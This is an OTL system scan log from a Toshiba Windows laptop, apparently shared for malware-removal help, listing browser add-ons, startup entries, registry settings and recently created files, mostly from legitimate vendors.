O2 - BHO: (TmBpIeBHO Class) - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\SECURITY\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll (Trend Micro Inc.)
O2 - BHO: (TOSHIBA Media Controller Plug-in) - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (E-Photo) - {60B127CA-8AA4-4DCD-84A8-D18C2B2C4A96} - C:\Program Files (x86)\EPSON Software\E-Photo\EPTBL.dll (SEIKO EPSON CORPORATION)
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (セキュリティツールバー) - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\SECURITY\SEC\plugin\ToolbarIE64\ToolbarIE.dll (Trend Micro Inc.)
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (E-Web Print) - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\EPSON Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION)
O3 - HKLM\..\Toolbar: (セキュリティツールバー) - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll (Trend Micro Inc.)
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [] File not found
O4:[b]64bit:[/b] - HKLM..\Run: [cAudioFilterAgent] C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent64.exe (Conexant Systems, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IntelPAN] C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe (Intel(R) Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Platinum] C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSessionAgent.exe (Trend Micro Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [SmartAudio] C:\Program Files\CONEXANT\SAII\SAIICpl.exe (Conexant systems, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [TCrdMain] C:\Program Files\Toshiba\FlashCards\TCrdMain.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Teco] C:\Program Files\TOSHIBA\TECO\Teco.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TosNC] C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TosReelTimeMonitor] C:\Program Files\Toshiba\ReelTime\TosReelTimeMonitor.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TosSENotify] C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosWaitSrv.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TosWaitSrv] C:\Program Files\Toshiba\TPHM\TosWaitSrv.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TPSCMain] C:\Program Files\Toshiba\PeakShift\TPSCMain.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [TPwrMain] C:\Program Files\Toshiba\Power Saver\TPwrMain.exe (TOSHIBA Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Trend Micro Client Framework] C:\Program Files\NTTW\Security\UniClient\UiFrmWrk\UIWatchDog.exe (Trend Micro Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [Unattend0000000001{7EEC0247-1AD3-4C6D-95A0-BC5399CB7B8A}] C:\tosutils\palakidou\palakidou.exe (AnywhereWorking L.T.D.)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [EEventManager] C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION)
O4 - HKLM..\Run: [LLHDUSER] C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe (Intercom, Inc.)
O4 - HKLM..\Run: [NTTW_OSA_AUS] C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe (西日本電信電話株式会社)
O4 - HKLM..\Run: [ToshibaPlacesGadget] C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe (TOSHIBA CORPORATION)
O4 - HKLM..\Run: [ToshibaServiceStation] C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [TouchFree] C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [TSleepSrv] C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe (TOSHIBA)
O4 - HKLM..\Run: [TSUScheduler] C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe (TOSHIBA Corporation)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000..\Run: [EPLTarget\P0000000000000000] C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A" File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O8:[b]64bit:[/b] - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll (TODO: <会社名>)
O8 - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll (TODO: <会社名>)
O9:[b]64bit:[/b] - Extra Button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\Toshiba\BulletinBoard\TosBBCom64.dll (TODO: <会社名>)
O9:[b]64bit:[/b] - Extra 'Tools' menuitem : @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\Toshiba\BulletinBoard\TosBBCom64.dll (TODO: <会社名>)
O9 - Extra Button: 故障かな?と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe (西日本電信電話株式会社)
O9 - Extra Button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\Toshiba\BulletinBoard\TosBBCom.dll (TODO: <会社名>)
O9 - Extra 'Tools' menuitem : @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\Toshiba\BulletinBoard\TosBBCom.dll (TODO: <会社名>)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O15:[b]64bit:[/b] - ..Trusted Domains: fresheye.com ([dynabook] http in Trusted sites)
O15:[b]64bit:[/b] - ..Trusted Domains: gmodules.com ([www.ig] http in Trusted sites)
O15 - HKLM\..Trusted Domains: fresheye.com ([dynabook] http in Trusted sites)
O15 - HKLM\..Trusted Domains: gmodules.com ([www.ig] http in Trusted sites)
O16 - DPF: {53F4962A-8E27-4601-8B01-79A82B4D7FC9} https://member.gungho.jp/front/member/webgs/LoadPrgAx.CAB (LoadPrg Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 10.56.82.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{61187789-556E-40B7-85C3-EA4AD3D1469F}: DhcpNameServer = 192.168.11.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A5DD2B07-6AA8-4C23-BE1E-15E035B596BB}: DhcpNameServer = 10.56.82.1
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\tmbp {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\SECURITY\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll (Trend Micro Inc.)
O18:[b]64bit:[/b] - Protocol\Handler\tmop {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\NTTW\SECURITY\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll (Trend Micro Inc.)
O18:[b]64bit:[/b] - Protocol\Handler\tmtb {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\SECURITY\SEC\plugin\ToolbarIE64\ToolbarIE.dll (Trend Micro Inc.)
O18:[b]64bit:[/b] - Protocol\Handler\tmtbim {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\SECURITY\SEC\plugin\ToolbarIE64\ProToolbarIMRatingActiveX.dll (Trend Micro Inc.)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\ms-help - No CLSID value found
O18 - Protocol\Handler\tmbp {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\SECURITY\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll (Trend Micro Inc.)
O18 - Protocol\Handler\tmop {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\NTTW\SECURITY\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll (Trend Micro Inc.)
O18 - Protocol\Handler\tmtb {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll (Trend Micro Inc.)
O18 - Protocol\Handler\tmtbim {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\SECURITY\SEC\UIFramework\ProToolbarIMRatingActiveX.dll (西日本電信電話株式会社)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2007/11/02 13:53:02 | 000,000,052 | R--- | M] () - E:\AUTORUN.INF -- [ UDF ]
O33 - MountPoints2\{0c41ba4f-8d5b-11e1-8271-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{0c41ba4f-8d5b-11e1-8271-806e6f6e6963}\Shell\AutoRun\command - "" = E:\Setup.exe -- [2010/05/17 09:46:58 | 000,132,472 | R--- | M] (BUFFALO INC.)
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (MACHINE BootExecut)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/29 23:30:25 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/04/29 23:30:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2015/04/29 23:30:16 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mbamchameleon.sys
[2015/04/29 23:30:16 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mwac.sys
[2015/04/29 23:24:09 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Malwarebytes
[2015/04/29 23:24:05 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/29 23:24:03 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mbam.sys
[2015/04/29 22:17:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Deployment
[2015/04/29 22:17:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Apps
[2015/04/29 22:08:48 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/04/27 23:02:43 | 000,000,000 | ---D | C] -- C:\windows\pss
[2015/04/27 22:25:09 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Geek Uninstaller
[2015/04/27 22:24:50 | 000,000,000 | ---D | C] -- C:\Users\Owner\Desktop\geek
[2015/04/27 22:19:23 | 000,000,000 | -H-D | C] -- C:\TMRescueDisk
[2015/04/27 22:15:47 | 000,407,864 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmnciesc.sys
[2015/04/27 22:15:11 | 000,106,296 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmeevw.sys
[2015/04/27 22:14:59 | 000,305,832 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmcomm.sys
[2015/04/27 22:14:59 | 000,121,944 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmactmon.sys
[2015/04/27 22:14:59 | 000,093,664 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmevtmgr.sys
[2015/04/27 22:14:52 | 000,106,296 | ---- | C] (Trend Micro Inc.) -- C:\windows\SysNative\drivers\tmusa.sys
[2015/04/27 18:59:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/04/27 18:59:04 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/04/18 11:48:31 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/04/17 22:27:14 | 000,173,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuwebv.dll
[2015/04/17 22:27:14 | 000,092,672 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wudriver.dll
[2015/04/17 22:27:14 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuapp.exe
[2015/04/17 22:27:14 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuapp.exe
[2015/04/17 22:27:14 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wups.dll
[2015/04/17 22:27:13 | 003,298,816 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wucltux.dll
[2015/04/17 22:27:13 | 000,696,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuapi.dll
[2015/04/17 22:27:13 | 000,566,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuapi.dll
[2015/04/17 22:27:13 | 000,191,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuwebv.dll
[2015/04/17 22:27:13 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuauclt.exe
[2015/04/17 22:27:13 | 000,098,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wudriver.dll
[2015/04/17 22:27:13 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WinSetupUI.dll
[2015/04/17 22:27:13 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wups2.dll
[2015/04/17 22:27:13 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wups.dll
[2015/04/17 22:27:13 | 000,012,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wu.upgrade.ps.dll
[2015/04/17 22:26:37 | 000,957,952 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\appraiser.dll
[2015/04/17 22:26:37 | 000,769,536 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\invagent.dll
[2015/04/17 22:26:37 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\generaltel.dll
[2015/04/17 22:26:37 | 000,419,840 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\devinv.dll
[2015/04/17 22:26:37 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aepic.dll
[2015/04/17 22:26:37 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\acmigration.dll
[2015/04/17 22:26:36 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aeinv.dll
[2015/04/17 22:26:35 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aepdu.dll
[2015/04/17 22:26:29 | 000,404,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\gdi32.dll
[2015/04/17 22:26:22 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msxml3r.dll
[2015/04/17 22:26:22 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msxml3r.dll
[2015/04/17 22:26:05 | 005,557,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ntoskrnl.exe
[2015/04/17 22:26:04 | 001,727,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ntdll.dll
[2015/04/17 22:26:03 | 001,163,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\kernel32.dll
[2015/04/17 22:26:03 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KernelBase.dll
[2015/04/17 22:26:01 | 003,920,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ntoskrnl.exe
[2015/04/17 22:25:59 | 003,976,632 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ntkrnlpa.exe
[2015/04/17 22:25:58 | 001,461,760 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\lsasrv.dll
[2015/04/17 22:25:58 | 000,362,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wow64win.dll
[2015/04/17 22:25:57 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srcore.dll
[2015/04/17 22:25:57 | 000,338,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\conhost.exe
[2015/04/17 22:25:57 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rstrui.exe
[2015/04/17 22:25:57 | 000,243,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wow64.dll
[2015/04/17 22:25:57 | 000,215,040 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winsrv.dll
[2015/04/17 22:25:56 | 000,309,760 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ncrypt.dll
[2015/04/17 22:25:55 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sspicli.dll
[2015/04/17 22:25:55 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\smss.exe
[2015/04/17 22:25:55 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\auditpol.exe
[2015/04/17 22:25:55 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\auditpol.exe
[2015/04/17 22:25:55 | 000,025,600 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\setup16.exe
[2015/04/17 22:25:54 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srclient.dll
[2015/04/17 22:25:54 | 000,043,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\csrsrv.dll
[2015/04/17 22:25:54 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ntvdm64.dll
[2015/04/17 22:25:53 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sspisrv.dll
[2015/04/17 22:25:53 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\secur32.dll
[2015/04/17 22:25:53 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ntvdm64.dll
[2015/04/17 22:25:52 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wow64cpu.dll
[2015/04/17 22:25:51 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-file-l1-1-0.dll
[2015/04/17 22:25:51 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-file-l1-1-0.dll
[2015/04/17 22:25:51 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wow32.dll
[2015/04/17 22:25:51 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-threadpool-l1-1-0.dll
[2015/04/17 22:25:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-sysinfo-l1-1-0.dll
[2015/04/17 22:25:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-sysinfo-l1-1-0.dll
[2015/04/17 22:25:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-synch-l1-1-0.dll
[2015/04/17 22:25:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-synch-l1-1-0.dll
[2015/04/17 22:25:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-misc-l1-1-0.dll
[2015/04/17 22:25:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-xstate-l1-1-0.dll
[2015/04/17 22:25:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-util-l1-1-0.dll
[2015/04/17 22:25:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-string-l1-1-0.dll
[2015/04/17 22:25:50 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-processthreads-l1-1-0.dll
[2015/04/17 22:25:50 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-processthreads-l1-1-0.dll
[2015/04/17 22:25:50 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-misc-l1-1-0.dll
[2015/04/17 22:25:50 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-localregistry-l1-1-0.dll
[2015/04/17 22:25:50 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-localregistry-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-rtlsupport-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-processenvironment-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-processenvironment-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-namedpipe-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-namedpipe-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-memory-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-memory-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-libraryloader-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-interlocked-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-string-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-rtlsupport-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-profile-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-profile-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-io-l1-1-0.dll
[2015/04/17 22:25:50 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-io-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-heap-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-heap-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-interlocked-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-handle-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-handle-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-fibers-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-fibers-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysWow64\api-ms-win-core-errorhandling-l1-1-0.dll
[2015/04/17 22:25:49 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\windows\SysNative\api-ms-win-core-errorhandling-l1-1-0.dll
